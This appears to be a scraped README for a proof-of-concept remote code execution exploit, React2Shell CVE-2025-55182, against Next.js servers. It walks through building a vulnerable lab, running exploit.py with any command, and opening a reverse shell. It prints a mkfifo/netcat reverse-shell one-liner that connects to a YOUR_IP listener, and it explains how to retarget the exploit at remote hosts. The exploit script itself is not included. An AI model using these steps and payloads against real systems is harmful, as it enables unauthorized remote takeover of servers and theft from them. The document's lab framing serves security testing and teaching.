Share
## https://sploitus.com/exploit?id=F43285B2-13FE-5FF3-AF4C-FD7D5630CC58
# React2Shell CVE-2025-55182  

A proof-of-concept exploit demonstrating a remote code execution vulnerability in Next.js applications through prototype pollution in the React server components rendering pipeline.

## โš ๏ธ Disclaimer  
This tool is for educational and authorized testing purposes only. Unauthorized use against systems you don't own or have permission to test is illegal.

## ๐Ÿ“‹ Prerequisites

- Node.js (v16 or later)
- Python 3.6+
- netcat (for reverse shells)
- A vulnerable Next.js application (included in this repo)

## ๐Ÿš€ Quick Start

### Option 1: Use Pre-configured Lab

#### 1. Clone the Repository

```bash
git clone https://github.com/securifyai/React2Shell-CVE-2025-55182.git
cd React2Shell-CVE-2025-55182
```

### Option 2: Create Server from Scratch

```bash
# Create a new Next.js app with the vulnerable version
npm create next-app@15.4.7 react2shell-lab
# Accept all defaults when prompted
cd react2shell-lab
```

> **Note**: The pre-configured lab already includes the necessary vulnerable code. If creating from scratch, you'll need to manually add the vulnerable components.

### 2. Install Dependencies

```bash
cd react2shell-lab
npm install
```

### 3. Start the Vulnerable Server

In terminal 1:
```bash
npm run dev
```

The server should start on `http://localhost:3000`

## ๐Ÿ”ง Exploitation

### Basic Command Execution

1. The repository includes an `exploit.py` file that demonstrates the vulnerability. Edit the `COMMAND` variable in the file to your desired command:
   ```python
   COMMAND = 'whoami'  # Change this to any command you want to execute
   ```

2. Run the exploit:
   ```bash
   python3 exploit.py
   ```

### Reverse Shell

1. Set up a netcat listener in a new terminal:
   ```bash
   nc -nvlp 4444
   ```

2. Edit `exploit.py` and update the command to your reverse shell payload:
   ```python
   COMMAND = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f'
   ```
   Replace `YOUR_IP` with your local machine's IP address.

3. Run the exploit:
   ```bash
   python3 exploit.py
   ```

## ๐Ÿ› ๏ธ Advanced Usage

### Testing Remote Targets

Edit the `HOST` variable in the exploit script to target remote servers:

```python
HOST = 'target-ip-address'  # Replace with target IP
PORT = 3000  # Default Next.js port
```

### Common Commands

- List directory contents: `ls -la`
- Get system information: `uname -a`
- Get current user: `whoami`
- Get network information: `ifconfig` or `ip a`

## ๐Ÿ” Troubleshooting

- **Connection refused**: Ensure the target server is running and accessible
- **Command not found**: The target system might not have certain binaries installed
- **No output**: The command might have executed but not produced any output

## ๐Ÿ“š References

- [CVE-2025-55182](https://vulners.com/cve/CVE-2025-55182)
- [Next.js Security Advisories](https://github.com/vercel/next.js/security/advisories)
- [Prototype Pollution in JavaScript](https://portswigger.net/web-security/prototype-pollution)

## ๐Ÿ“„ License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

This version asks for user input for remote target and attacker IPs and ports. The post body (body_parts) is also trimmed down slightly in this version.

### Sources:
https://www.averlon.ai/blog/react2shell-cve-2025-55182-explained  

https://tryhackme.com/room/react2shellcve202555182